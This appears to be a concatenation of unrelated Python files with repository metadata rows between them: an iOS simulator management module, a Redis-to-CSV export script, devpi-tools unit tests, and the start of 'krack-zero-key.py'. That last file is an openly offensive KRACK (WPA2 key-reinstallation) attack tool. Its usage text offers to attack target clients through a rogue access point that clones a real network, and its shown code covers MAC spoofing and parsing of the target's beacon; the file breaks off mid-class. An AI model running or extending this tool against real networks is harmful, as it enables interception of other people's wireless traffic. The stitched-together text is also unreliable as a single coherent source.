_SIM_CHECK_STATE_INTERVAL_SEC = 0.5
_PATTERN_APP_CRASH_ON_SIM = (
r'com\.apple\.CoreSimulator\.SimDevice\.[A-Z0-9\-]+(.+) '
r'\(UIKitApplication:%s(.+)\): Service exited '
'(due to (signal|Terminated|Killed|Abort trap)|with abnormal code)')
_PATTERN_XCTEST_PROCESS_CRASH_ON_SIM = (
r'com\.apple\.CoreSimulator\.SimDevice\.[A-Z0-9\-]+(.+) '
r'\((.+)xctest\[[0-9]+\]\): Service exited '
'(due to (signal|Terminated|Killed|Abort trap)|with abnormal code)')
_PATTERN_CORESIMULATOR_CRASH = (
r'com\.apple\.CoreSimulator\.SimDevice\.[A-Z0-9\-]+(.+) '
r'\(com\.apple\.CoreSimulator(.+)\): Service exited due to ')
class Simulator(object):
"""The object for simulator in MacOS."""
def __init__(self, simulator_id):
"""Constructor of Simulator object.
Args:
simulator_id: string, the identity of the simulator.
"""
self._simulator_id = simulator_id
self._simulator_root_dir = None
self._simulator_log_root_dir = None
self._device_plist_object = None
@property
def simulator_id(self):
if not self._simulator_id:
raise ios_errors.SimError(
'The simulator has not been created or has been deleted.')
return self._simulator_id
@property
def simulator_system_log_path(self):
return os.path.join(self.simulator_log_root_dir, 'system.log')
@property
def simulator_root_dir(self):
"""Gets the simulator's root directory."""
if not self._simulator_root_dir:
home_dir = pwd.getpwuid(os.geteuid()).pw_dir
self._simulator_root_dir = os.path.join(
'%s/Library/Developer/CoreSimulator/Devices/%s' %
(home_dir, self.simulator_id))
return self._simulator_root_dir
@property
def simulator_log_root_dir(self):
"""Gets the root directory of the simulator's logs."""
if not self._simulator_log_root_dir:
home_dir = pwd.getpwuid(os.geteuid()).pw_dir
self._simulator_log_root_dir = os.path.join(
'%s/Library/Logs/CoreSimulator/%s' % (home_dir, self.simulator_id))
return self._simulator_log_root_dir
@property
def device_plist_object(self):
"""Gets the plist_util.Plist object of device.plist of the simulator.
Returns:
a plist_util.Plist object of device.plist of the simulator or None when
the simulator does not exist or is being created.
"""
if not self._device_plist_object:
device_plist_path = os.path.join(self.simulator_root_dir, 'device.plist')
if not os.path.exists(device_plist_path):
return None
self._device_plist_object = plist_util.Plist(device_plist_path)
return self._device_plist_object
def Shutdown(self):
"""Shuts down the simulator."""
sim_state = self.GetSimulatorState()
if sim_state == ios_constants.SimState.SHUTDOWN:
logging.info('Simulator %s has already shut down.', self.simulator_id)
return
if sim_state == ios_constants.SimState.CREATING:
raise ios_errors.SimError(
'Can not shut down the simulator in state CREATING.')
logging.info('Shutting down simulator %s.', self.simulator_id)
try:
RunSimctlCommand(['xcrun', 'simctl', 'shutdown', self.simulator_id])
except ios_errors.SimError as e:
if 'Unable to shutdown device in current state: Shutdown' in str(e):
logging.info('Simulator %s has already shut down.', self.simulator_id)
return
raise ios_errors.SimError('Failed to shutdown simulator %s: %s' %
(self.simulator_id, str(e)))
self.WaitUntilStateShutdown()
logging.info('Shut down simulator %s.', self.simulator_id)
def Delete(self):
"""Deletes the simulator asynchronously.
The simulator state should be SHUTDOWN when deleting it. Otherwise, it will
raise exception.
Raises:
ios_errors.SimError: The simulator's state is not SHUTDOWN.
"""
# In Xcode 9+, simctl can delete Booted simulator. In prior of Xcode 9,
# we have to shutdown the simulator first before deleting it.
if xcode_info_util.GetXcodeVersionNumber() < 900:
sim_state = self.GetSimulatorState()
if sim_state != ios_constants.SimState.SHUTDOWN:
raise ios_errors.SimError(
'Can only delete the simulator with state SHUTDOWN. The current '
'state of simulator %s is %s.' % (self._simulator_id, sim_state))
logging.info('Deleting simulator %s asynchronously.', self.simulator_id)
subprocess.Popen(['xcrun', 'simctl', 'delete', self.simulator_id],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setpgrp)
# The delete command won't delete the simulator log directory.
if os.path.exists(self.simulator_log_root_dir):
shutil.rmtree(self.simulator_log_root_dir, ignore_errors=True)
self._simulator_id = None
def FetchLogToFile(self, output_file_path, start_time=None, end_time=None):
"""Gets simulator log via running `log` tool on simulator.
Args:
output_file_path: string, the path of the stdout file.
start_time: datetime, the start time of the simulatro log.
end_time: datetime, the end time of the simulatro log.
"""
command = [
'xcrun', 'simctl', 'spawn', self._simulator_id, 'log', 'show',
'--style', 'syslog'
]
if start_time:
command.extend(('--start', start_time.strftime('%Y-%m-%d %H:%M:%S')))
if end_time:
command.extend(('--end', end_time.strftime('%Y-%m-%d %H:%M:%S')))
with open(output_file_path, 'w') as stdout_file:
try:
subprocess.Popen(command, stdout=stdout_file, stderr=subprocess.STDOUT)
except ios_errors.SimError as e:
raise ios_errors.SimError('Failed to get log on simulator %s: %s' %
(self.simulator_id, str(e)))
def GetAppDocumentsPath(self, app_bundle_id):
"""Gets the path of the app's Documents directory."""
if xcode_info_util.GetXcodeVersionNumber() >= 830:
try:
app_data_container = RunSimctlCommand([
'xcrun', 'simctl', 'get_app_container', self._simulator_id,
app_bundle_id, 'data'
])
return os.path.join(app_data_container, 'Documents')
except ios_errors.SimError as e:
raise ios_errors.SimError(
'Failed to get data container of the app %s in simulator %s: %s' %
(app_bundle_id, self._simulator_id, str(e)))
apps_dir = os.path.join(self.simulator_root_dir,
'data/Containers/Data/Application')
for sub_dir_name in os.listdir(apps_dir):
container_manager_plist = plist_util.Plist(
os.path.join(apps_dir, sub_dir_name,
'.com.apple.mobile_container_manager.metadata.plist'))
current_app_bundle_id = container_manager_plist.GetPlistField(
'MCMMetadataIdentifier')
if current_app_bundle_id == app_bundle_id:
return os.path.join(apps_dir, sub_dir_name, 'Documents')
raise ios_errors.SimError(
'Failed to get Documents directory of the app %s in simulator %s' %
(app_bundle_id, self._simulator_id))
def IsAppInstalled(self, app_bundle_id):
"""Checks if the simulator has installed the app with given bundle id."""
try:
RunSimctlCommand([
'xcrun', 'simctl', 'get_app_container', self._simulator_id,
app_bundle_id
])
return True
except ios_errors.SimError:
return False
def WaitUntilStateShutdown(self, timeout_sec=_SIMULATOR_SHUTDOWN_TIMEOUT_SEC):
"""Waits until the simulator state becomes SHUTDOWN.
Args:
timeout_sec: int, timeout of waiting simulator state for becoming SHUTDOWN
in seconds.
Raises:
ios_errors.SimError: when it is timeout to wait the simulator state
becomes SHUTDOWN.
"""
start_time = time.time()
while start_time + timeout_sec >= time.time():
if self.GetSimulatorState() == ios_constants.SimState.SHUTDOWN:
return
time.sleep(_SIM_CHECK_STATE_INTERVAL_SEC)
raise ios_errors.SimError('Timeout to wait for simulator shutdown in %ss.' %
timeout_sec)
def GetSimulatorState(self):
"""Gets the state of the simulator in real time.
Returns:
shared.ios_constants.SimState, the state of the simulator.
Raises:
ios_errors.SimError: The state can not be recognized.
"""
if self.device_plist_object is None:
return ios_constants.SimState.CREATING
state_num = self.device_plist_object.GetPlistField('state')
if state_num not in _SIMULATOR_STATES_MAPPING.keys():
logging.warning('The state %s of simulator %s can not be recognized.',
state_num, self.simulator_id)
return ios_constants.SimState.UNKNOWN
return _SIMULATOR_STATES_MAPPING[state_num]
def CreateNewSimulator(device_type=None, os_version=None, name_prefix=None):
"""Creates a new simulator according to arguments.
If neither device_type nor os_version is given, will use the latest iOS
version and latest iPhone type.
If os_version is given but device_type is not, will use latest iPhone type
according to the OS version limitation. E.g., if the given os_version is 9.3,
the latest simulator type is iPhone 6s Plus. Because the min OS version of
iPhone 7 is 10.0.
If device_type is given but os_version is not, will use the min value
between max OS version of the simulator type and current latest OS version.
E.g., if the given device_type is iPhone 5 and latest OS version is 10.3,
will use 10.2. Because the max OS version of iPhone 5 is 10.2.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
os_version: string, OS version of the new simulator. The format is
{major}.{minor}, such as 9.3, 10.2.
name_prefix: string, name prefix of the new simulator. By default, it is
"New".
Returns:
a tuple with four items:
string, id of the new simulator.
string, simulator device type of the new simulator.
string, OS version of the new simulator.
string, name of the new simulator.
Raises:
ios_errors.SimError: when failed to create new simulator.
ios_errors.IllegalArgumentError: when the given argument is invalid.
"""
if not device_type:
os_type = ios_constants.OS.IOS
else:
_ValidateSimulatorType(device_type)
os_type = GetOsType(device_type)
if not os_version:
os_version = GetLastSupportedSimOsVersion(os_type, device_type=device_type)
else:
supported_sim_os_versions = GetSupportedSimOsVersions(os_type)
if os_version not in supported_sim_os_versions:
raise ios_errors.IllegalArgumentError(
'The simulator os version %s is not supported. Supported simulator '
'os versions are %s.' % (os_version, supported_sim_os_versions))
if not device_type:
device_type = GetLastSupportedIphoneSimType(os_version)
else:
_ValidateSimulatorTypeWithOsVersion(device_type, os_version)
if not name_prefix:
name_prefix = 'New'
name = '%s-%s-%s' % (name_prefix, device_type, os_version)
# Example
# Runtime ID of iOS 10.2: com.apple.CoreSimulator.SimRuntime.iOS-10-2
runtime_id = _PREFIX_RUNTIME_ID + os_type + '-' + os_version.replace('.', '-')
logging.info('Creating a new simulator:\nName: %s\nOS: %s %s\nType: %s', name,
os_type, os_version, device_type)
for i in range(0, _SIM_OPERATION_MAX_ATTEMPTS):
try:
new_simulator_id = RunSimctlCommand(
['xcrun', 'simctl', 'create', name, device_type, runtime_id])
except ios_errors.SimError as e:
raise ios_errors.SimError('Failed to create simulator: %s' % str(e))
new_simulator_obj = Simulator(new_simulator_id)
# After creating a new simulator, its state is CREATING. When the
# simulator's state becomes SHUTDOWN, the simulator is created.
try:
new_simulator_obj.WaitUntilStateShutdown(
_SIMULATOR_CREATING_TO_SHUTDOWN_TIMEOUT_SEC)
logging.info('Created new simulator %s.', new_simulator_id)
return new_simulator_id, device_type, os_version, name
except ios_errors.SimError as error:
logging.debug('Failed to create simulator %s: %s.', new_simulator_id,
error)
logging.debug('Deleted half-created simulator %s.', new_simulator_id)
new_simulator_obj.Delete()
if i != _SIM_OPERATION_MAX_ATTEMPTS - 1:
logging.debug('Will sleep %ss and retry again.',
_SIM_ERROR_RETRY_INTERVAL_SEC)
# If the simulator's state becomes SHUTDOWN, there may be something
# wrong in CoreSimulatorService. Sleeps a short interval(2s) can help
# reduce flakiness.
time.sleep(_SIM_ERROR_RETRY_INTERVAL_SEC)
raise ios_errors.SimError('Failed to create simulator in %d attempts.' %
_SIM_OPERATION_MAX_ATTEMPTS)
def GetSupportedSimDeviceTypes(os_type=None):
"""Gets the name list of supported simulator device types of given OS type.
If os_type is not provided, it will return all supported simulator device
types. The names are got from command result of `xcrun simctl list devices`.
So some simulator device types' names may be different in different Xcode.
E.g., the name of iPad Pro (12.9-inch) in Xcode 7.2.1 is "iPad Pro", but it is
"iPad Pro (12.9-inch)" in Xcode 8+.
Args:
os_type: shared.ios_constants.OS, OS type of simulator, such as iOS,
watchOS, tvOS.
Returns:
a list of string, each item is a simulator device type.
E.g., ["iPhone 5", "iPhone 6 Plus"]
"""
# Example output:
# {
# "devicetypes" : [
# {
# "name" : "iPhone 5",
# "identifier" : "com.apple.CoreSimulator.SimDeviceType.iPhone-5"
# }
# ]
# }
#
# See more examples in testdata/simctl_list_devicetypes.json
sim_types_infos_json = json.loads(
RunSimctlCommand(('xcrun', 'simctl', 'list', 'devicetypes', '-j')))
sim_types = []
for sim_types_info in sim_types_infos_json['devicetypes']:
sim_type = sim_types_info['name']
if (os_type is None or
(os_type == ios_constants.OS.IOS and sim_type.startswith('i')) or
(os_type == ios_constants.OS.TVOS and 'TV' in sim_type) or
(os_type == ios_constants.OS.WATCHOS and 'Watch' in sim_type)):
sim_types.append(sim_type)
return sim_types
def GetLastSupportedIphoneSimType(os_version):
""""Gets the last supported iPhone simulator type of the given OS version.
Currently, the last supported iPhone simulator type is the last iPhone from
the output of `xcrun simctl list devicetypes`.
Args:
os_version: string, OS version of the new simulator. The format is
{major}.{minor}, such as 9.3, 10.2.
Returns:
a string, the last supported iPhone simulator type.
Raises:
ios_errors.SimError: when there is no supported iPhone simulator type.
"""
supported_sim_types = GetSupportedSimDeviceTypes(ios_constants.OS.IOS)
supported_sim_types.reverse()
os_version_float = float(os_version)
for sim_type in supported_sim_types:
if sim_type.startswith('iPhone'):
min_os_version_float = float(
simtype_profile.SimTypeProfile(sim_type).min_os_version)
if os_version_float >= min_os_version_float:
return sim_type
raise ios_errors.SimError('Can not find supported iPhone simulator type.')
def GetSupportedSimOsVersions(os_type=ios_constants.OS.IOS):
"""Gets the supported version of given simulator OS type.
Args:
os_type: shared.ios_constants.OS, OS type of simulator, such as iOS,
watchOS, tvOS.
Returns:
a list of string, each item is an OS version number. E.g., ["10.1", "11.0"]
"""
if os_type is None:
os_type = ios_constants.OS.IOS
# Example output:
# {
# "runtimes" : [
# {
# "bundlePath" : "\/Applications\/Xcode10.app\/Contents\/Developer\
# /Platforms\/iPhoneOS.platform\/Developer\/Library\
# /CoreSimulator\/Profiles\/Runtimes\/iOS.simruntime",
# "availabilityError" : "",
# "buildversion" : "16A366",
# "availability" : "(available)",
# "isAvailable" : true,
# "identifier" : "com.apple.CoreSimulator.SimRuntime.iOS-12-0",
# "version" : "12.0",
# "name" : "iOS 12.0"
# }
# }
# See more examples in testdata/simctl_list_runtimes.json
xcode_version_num = xcode_info_util.GetXcodeVersionNumber()
sim_runtime_infos_json = json.loads(
RunSimctlCommand(('xcrun', 'simctl', 'list', 'runtimes', '-j')))
sim_versions = []
for sim_runtime_info in sim_runtime_infos_json['runtimes']:
# Normally, the json does not contain unavailable runtimes. To be safe,
# also checks the 'availability' field.
if 'availability' in sim_runtime_info and sim_runtime_info[
'availability'].find('unavailable') >= 0:
continue
elif 'isAvailable' in sim_runtime_info and not sim_runtime_info[
'isAvailable']:
continue
listed_os_type, listed_os_version = sim_runtime_info['name'].split(' ', 1)
if listed_os_type == os_type:
# `bundlePath` key may not exist in the old Xcode/macOS version.
if 'bundlePath' in sim_runtime_info:
runtime_path = sim_runtime_info['bundlePath']
info_plist_object = plist_util.Plist(
os.path.join(runtime_path, 'Contents/Info.plist'))
min_xcode_version_num = int(info_plist_object.GetPlistField('DTXcode'))
if xcode_version_num >= min_xcode_version_num:
sim_versions.append(listed_os_version)
else:
if os_type == ios_constants.OS.IOS:
ios_major_version, ios_minor_version = listed_os_version.split('.', 1)
# Ingores the potential build version
ios_minor_version = ios_minor_version[0]
ios_version_num = int(ios_major_version) * 100 + int(
ios_minor_version) * 10
# One Xcode version always maps to one max simulator's iOS version.
# The rules is almost max_sim_ios_version <= xcode_version + 200.
# E.g., Xcode 8.3.1/8.3.3 maps to iOS 10.3, Xcode 7.3.1 maps to iOS
# 9.3.
if ios_version_num > xcode_version_num + 200:
continue
sim_versions.append(listed_os_version)
return sim_versions
def GetLastSupportedSimOsVersion(os_type=ios_constants.OS.IOS,
device_type=None):
"""Gets the last supported version of given arguments.
If device_type is given, will return the last supported OS version of the
device type. Otherwise, will return the last supported OS version of the
OS type.
Args:
os_type: shared.ios_constants.OS, OS type of simulator, such as iOS,
watchOS, tvOS.
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
Returns:
a string, the last supported version.
Raises:
ios_errors.SimError: when there is no supported OS version of the given OS.
ios_errors.IllegalArgumentError: when the supported OS version can not match
the given simulator type.
"""
supported_os_versions = GetSupportedSimOsVersions(os_type)
if not supported_os_versions:
raise ios_errors.SimError('Can not find supported OS version of %s.' %
os_type)
if not device_type:
return supported_os_versions[-1]
simtype_max_os_version_float = float(
simtype_profile.SimTypeProfile(device_type).max_os_version)
supported_os_versions.reverse()
for os_version in supported_os_versions:
if float(os_version) <= simtype_max_os_version_float:
return os_version
if not supported_os_versions:
raise ios_errors.IllegalArgumentError(
'The supported OS version %s can not match simulator type %s. Because '
'its max OS version is %s' %
(supported_os_versions, device_type, simtype_max_os_version_float))
def GetOsType(device_type):
"""Gets the OS type of the given simulator.
This method can not work fine if the device_type is invalid. Please calls
simulator_util.ValidateSimulatorType(device_type, os_version) to validate
it first.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
Returns:
shared.ios_constants.OS.
Raises:
ios_errors.IllegalArgumentError: when the OS type of the given simulator
device type can not be recognized.
"""
if device_type.startswith('i'):
return ios_constants.OS.IOS
if 'TV' in device_type:
return ios_constants.OS.TVOS
if 'Watch' in device_type:
return ios_constants.OS.WATCHOS
raise ios_errors.IllegalArgumentError(
'Failed to recognize the os type for simulator device type %s.' %
device_type)
def _ValidateSimulatorType(device_type):
"""Checks if the simulator type is valid.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
Raises:
ios_errors.IllegalArgumentError: when the given simulator device type is
invalid.
"""
supported_sim_device_types = GetSupportedSimDeviceTypes()
if device_type not in supported_sim_device_types:
raise ios_errors.IllegalArgumentError(
'The simulator device type %s is not supported. Supported simulator '
'device types are %s.' % (device_type, supported_sim_device_types))
def _ValidateSimulatorTypeWithOsVersion(device_type, os_version):
"""Checks if the simulator type with the given os version is valid.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
os_version: string, OS version of the new simulator. The format is
{major}.{minor}, such as 9.3, 10.2.
Raises:
ios_errors.IllegalArgumentError: when the given simulator device type can
not match the given OS version.
"""
os_version_float = float(os_version)
sim_profile = simtype_profile.SimTypeProfile(device_type)
min_os_version_float = float(sim_profile.min_os_version)
if min_os_version_float > os_version_float:
raise ios_errors.IllegalArgumentError(
'The min OS version of %s is %s. But current OS version is %s' %
(device_type, min_os_version_float, os_version))
max_os_version_float = float(sim_profile.max_os_version)
if max_os_version_float < os_version_float:
raise ios_errors.IllegalArgumentError(
'The max OS version of %s is %s. But current OS version is %s' %
(device_type, max_os_version_float, os_version))
def QuitSimulatorApp():
"""Quits the Simulator.app."""
if xcode_info_util.GetXcodeVersionNumber() >= 700:
simulator_name = 'Simulator'
else:
simulator_name = 'iOS Simulator'
subprocess.Popen(['killall', simulator_name],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def IsAppFailedToLaunchOnSim(sim_sys_log, app_bundle_id=''):
"""Checks if the app failed to launch on simulator.
If app_bundle_id is not provided, will check if any UIKitApplication failed
to launch on simulator.
Args:
sim_sys_log: string, the content of the simulator's system.log.
app_bundle_id: string, the bundle id of the app.
Returns:
True if the app failed to launch on simulator.
"""
pattern = re.compile(_PATTERN_APP_CRASH_ON_SIM % app_bundle_id)
return pattern.search(sim_sys_log) is not None
def IsXctestFailedToLaunchOnSim(sim_sys_log):
"""Checks if the xctest process failed to launch on simulator.
Args:
sim_sys_log: string, the content of the simulator's system.log.
Returns:
True if the xctest process failed to launch on simulator.
"""
pattern = re.compile(_PATTERN_XCTEST_PROCESS_CRASH_ON_SIM)
return pattern.search(sim_sys_log) is not None
def IsCoreSimulatorCrash(sim_sys_log):
"""Checks if CoreSimulator crashes.
Args:
sim_sys_log: string, the content of the simulator's system.log.
Returns:
True if the CoreSimulator crashes.
"""
pattern = re.compile(_PATTERN_CORESIMULATOR_CRASH)
return pattern.search(sim_sys_log) is not None
def RunSimctlCommand(command):
"""Runs simctl command."""
for i in range(_SIMCTL_MAX_ATTEMPTS):
process = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if ios_constants.CORESIMULATOR_CHANGE_ERROR in stderr:
output = stdout
else:
output = '\n'.join([stdout, stderr])
output = output.strip()
if process.poll() != 0:
if (i < (_SIMCTL_MAX_ATTEMPTS - 1) and
ios_constants.CORESIMULATOR_INTERRUPTED_ERROR in output):
continue
raise ios_errors.SimError(output)
return output
| 38.70614 | 80 | 0.699906 |
5fe5dfa277b0f8ac2da857db2b1f7b9e4c14e0cb | 1,382 | py | Python | main.py | snosan-tools/avurnavs-csv | 89a18c7b278ff94540620c0a2545ba0c039b7153 | [
"MIT"
] | null | null | null | main.py | snosan-tools/avurnavs-csv | 89a18c7b278ff94540620c0a2545ba0c039b7153 | [
"MIT"
] | null | null | null | main.py | snosan-tools/avurnavs-csv | 89a18c7b278ff94540620c0a2545ba0c039b7153 | [
"MIT"
] | null | null | null | import json
import os
import redis as redis_lib
import requests
import pandas as pd
REGIONS = ['atlantique', 'manche', 'méditerranée']
r = requests.get(
'https://api.heroku.com/apps/avurnav/config-vars',
headers={
'Accept': 'application/vnd.heroku+json; version=3',
'Authorization': 'Bearer ' + os.environ['HEROKU_TOKEN']
}
)
r.raise_for_status()
redis = redis_lib.utils.from_url(r.json()['REDIS_URL'])
avurnavs = []
for region in REGIONS:
keys = redis.keys(region + ':*')
data = list(map(lambda e: json.loads(e), redis.mget(keys)))
avurnavs.extend(data)
df = pd.DataFrame(avurnavs)
df.rename(
columns={
'content': 'contenu',
'premar_region': 'region_prefecture_maritime',
'title': 'titre',
'valid_from': 'date_debut_vigueur',
'valid_until': 'date_fin_vigueur',
'number': 'numero_avurnav'
},
inplace=True
)
df = df[[
'id', 'region_prefecture_maritime', 'numero_avurnav',
'latitude', 'longitude', 'titre', 'contenu',
'date_debut_vigueur', 'date_fin_vigueur'
]]
# We could have duplicates because in the new
# version of the Préfet maritime websites they
# don't expose the ID column
df.drop_duplicates(
subset=['region_prefecture_maritime', 'numero_avurnav'],
keep='first',
inplace=True
)
df.to_csv('avurnavs.csv', index=False, float_format='%.10g')
| 24.678571 | 63 | 0.664255 |
cccf0570c63b10784e43d48a5a84f393463ff479 | 2,789 | py | Python | tests/test_devpi_request.py | bcicen/devpi-tools | 0f1844b4e5c9d7da2b21908ca2ff5c1593c564e4 | [
"MIT"
] | 7 | 2017-03-10T15:30:11.000Z | 2022-02-08T09:24:56.000Z | tests/test_devpi_request.py | bcicen/devpi-api-client | 0f1844b4e5c9d7da2b21908ca2ff5c1593c564e4 | [
"MIT"
] | 5 | 2020-01-12T22:01:00.000Z | 2021-07-30T10:51:16.000Z | tests/test_devpi_request.py | bcicen/devpi-api-client | 0f1844b4e5c9d7da2b21908ca2ff5c1593c564e4 | [
"MIT"
] | 2 | 2019-10-27T23:21:13.000Z | 2020-08-26T00:13:33.000Z | import json
from devpi_tools import DevpiClient
def mock_get_json_index(self, path, method='GET', **params):
return {
"root": {
"indexes": {
"pypi": {
"type": "mirror",
"volatile": False,
"title": "PyPI",
"mirror_url": "https://pypi.org/simple/",
"mirror_web_url_fmt": "https://pypi.org/project/{name}/"
},
},
"username": "root"
}
}
def mock_get_projects_json(self, path, method='GET', **params):
return {
"type": "stage",
"volatile": True,
"acl_upload": [
"root",
],
"acl_toxresult_upload": [
":ANONYMOUS:"
],
"bases": [],
"mirror_whitelist": [],
"pypi_whitelist": [],
"projects": [
"devpi-tools"
]
}
def mock_get_project_json(self, path, method='GET', **params):
json_file_path = './files/project.json'
with open(json_file_path) as f:
json_dict = json.load(f)
return json_dict
def mock_get_version_json(self, path, method='GET', **params):
json_file_path = './files/version.json'
with open(json_file_path, 'r') as f:
json_dict = json.load(f)
return json_dict
def test_devpi_request_indexes(monkeypatch):
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_json_index)
client = DevpiClient('http://127.0.0.1:3141')
list_indexes = client.indexes()
assert len(list_indexes) == 1
assert list_indexes[0].name == "pypi"
index = client.index('/root/pypi')
assert index.user == "root"
def test_devpi_request_projects(monkeypatch):
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_json_index)
client = DevpiClient('http://127.0.0.1:3141')
index = client.index('/root/pypi')
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_projects_json)
list_projects = index.projects()
assert len(list_projects) == 1
assert list_projects[0].path == "/root/pypi/devpi-tools"
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_project_json)
project = index.project('devpi-tools')
assert project.path == "/root/pypi/devpi-tools"
def test_devpi_request_version(monkeypatch):
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_json_index)
client = DevpiClient('http://127.0.0.1:3141')
index = client.index('/root/pypi')
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_project_json)
project = index.project('devpi-tools')
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_version_json)
version = project.version('0.0.1')
assert version.path == "/root/pypi/devpi-tools/0.0.1"
assert version.version == "0.0.1"
assert version.author == "Bradley Cicenas"
| 30.988889 | 72 | 0.625672 |
b68539bd2f7bb353b5fd3b76574b0ccfda1a24c8 | 542 | py | Python | easy-queue/modules/eqobject-service/eqobject/eqobject/api/status/endpoints/status.py | ebustosm6/easy-queue | 29ef23f6a686df0c9bb4ab85df7233b3ee64dc0d | [
"Apache-2.0"
] | null | null | null | easy-queue/modules/eqobject-service/eqobject/eqobject/api/status/endpoints/status.py | ebustosm6/easy-queue | 29ef23f6a686df0c9bb4ab85df7233b3ee64dc0d | [
"Apache-2.0"
] | null | null | null | easy-queue/modules/eqobject-service/eqobject/eqobject/api/status/endpoints/status.py | ebustosm6/easy-queue | 29ef23f6a686df0c9bb4ab85df7233b3ee64dc0d | [
"Apache-2.0"
] | null | null | null | import logging
from http import HTTPStatus
from flask import request
from flask_restplus import Resource
from eqobject.api.restplus import api
from easyqueue.core.base import EQObject, schema_eqobject
log = logging.getLogger(__name__)
ns = api.namespace('status', description='Health check')
@ns.route('/health')
class StatusEndpoint(Resource):
@api.response(HTTPStatus.INTERNAL_SERVER_ERROR, 'Unexpected server error.')
def get(self):
"""
Returns OK
"""
return dict(status="OK"), HTTPStatus.OK
| 22.583333 | 79 | 0.726937 |
2b72a86ab1bca48641dbb15c1822c1a536fa1808 | 28,931 | py | Python | krackattack/krack-zero-key.py | DreadsCasey/Krackattack | 4278e2aae10b013c06f40b653fda3441f2c6a73a | [
"BSD-3-Clause"
] | null | null | null | krackattack/krack-zero-key.py | DreadsCasey/Krackattack | 4278e2aae10b013c06f40b653fda3441f2c6a73a | [
"BSD-3-Clause"
] | null | null | null | krackattack/krack-zero-key.py | DreadsCasey/Krackattack | 4278e2aae10b013c06f40b653fda3441f2c6a73a | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2017, Adam Casey-Rerhaye
#
# This code may be distributed under the terms of the BSD license.
# See README for more details.
"""
Usage:
krack-zero-key.py -k <rouge_interface> <interface> <ssid> [--target <target_client>] [-v | --vv]
krack-zero-key.py -s <rouge_interface> <interface> [<ssid>] [-v]
krack-zero-key.py -r <rouge_interface> <interface>
krack-zero-key.py -h | --help
krack-zero-key.py --disable-hw
Options:
-k...................Preform a key-reinstalltion attack
-v...................Verbose output (Show's the pink debug messages) - optional.
--vv.................Even more verbose output, WARNING! there's alot of output!
-r...................To reset/restart services and close the rouge AP.
-h, --help...........Displays this message.
interface............The interface used.
rouge_interface......The interface used on the rouge channel.
ssid.................The SSID of the network to be cloned (spaces should be replace by '/').
--target.............Target client to exploit. This script will work better with a specific target - optional.
--disable-hw.........Disables hardware encryption.
Make sure to have all the dipendacies installed (see README for details)
To compile hostapd, open a terminal in the hostapd dir:
cp defconfig .config
make -j 2
May need to disable harware encryption
used --disable-hw to do so, then reboot to take effect
If error: Too many files open in system occours, run with -r option to reset
the interface configuration.
"""
import sys, time, os, subprocess, shlex, socket, struct, string, heapq, textwrap, fileinput
from docopt import docopt
from wpaspy import *
from libclass import *
from scapy.all import *
IEEE_TLV_TYPE_SSID = 0
IEEE_TLV_TYPE_CHANNEL = 3
IEEE_TLV_TYPE_RSN = 48
IEEE_TLV_TYPE_CSA = 37
IEEE_TLV_TYPE_VENDOR = 221
HANDSHAKE_TRANSMIT_INTERVAL = 2
IEEE80211_RADIOTAP_RATE = (1 << 2)
IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
#Master functions:
def set_mac_address(iface, macaddr):
subprocess.check_output(["ifconfig", iface, "down"])
try:
subprocess.check_output(["macchanger", "-m", macaddr, iface])
except subprocess.CalledProcessError, ex:
if not "It's the same MAC!!" in ex.output:
raise
subprocess.check_output(["ifconfig", iface, "up"])
def hostapd_command(hostapd_ctrl, cmd):
pass
def disable_hwcrypto():
log(INFO, 'Disabling hardware encryption')
subprocess.check_output(['./disable-hwcrypto.sh'])
#Class to configure the hostapd network to clone the real AP
#Credit to Mathy Vanhoef for providing what info is needed
class Network_Config:
def __init__(self):
self.ssid = None
self.real_channel = None
self.rouge_channel = None
self.group_cipher = None
self.wpavers = 0
self.pairwise_ciphers = set()
self.akms = set()
self.wmmenabled = 0
self.capab = 0
#check if the target network is actually a WPA1/2 RSN
def check_wparsn(self):
return not self.group_cipher is None and self.wpavers > 0 and \
len(self.pairwise_ciphers) > 0 and len(self.akms) > 0
def parse_wpa_rsn(self, wparsn):
self.group_cipher = ord(wparsn[5])
num_pairwise = struct.unpack("<H", wparsn[6:8])[0]
pos = wparsn[8:]
for i in range(num_pairwise):
self.pairwise_ciphers.add(ord(pos[3]))
pos = pos[4:]
num_akm = struct.unpack("<H", pos[:2])[0]
pos = pos[2:]
for i in range(num_akm):
self.akms.add(ord(pos[3]))
pos = pos[4:]
if len(pos) >= 2:
self.capab = struct.unpack("<H", pos[:2])[0]
#extract the useful info from the beacon probe
def get_beacon_info(self, p):
el = p[Dot11Elt]
while isinstance(el, Dot11Elt):
if el.ID == IEEE_TLV_TYPE_SSID:
self.ssid = el.info
elif el.ID == IEEE_TLV_TYPE_CHANNEL:
self.real_channel = ord(el.info[0])
elif el.ID == IEEE_TLV_TYPE_RSN:
self.parse_wpa_rsn(el.info)
self.wpavers |= 2
elif el.ID == IEEE_TLV_TYPE_VENDOR and el.info[:4] == "\x00\x50\xf2\x01":
self.parse_wpa_rsn(el.info[4:])
self.wpavers |= 1
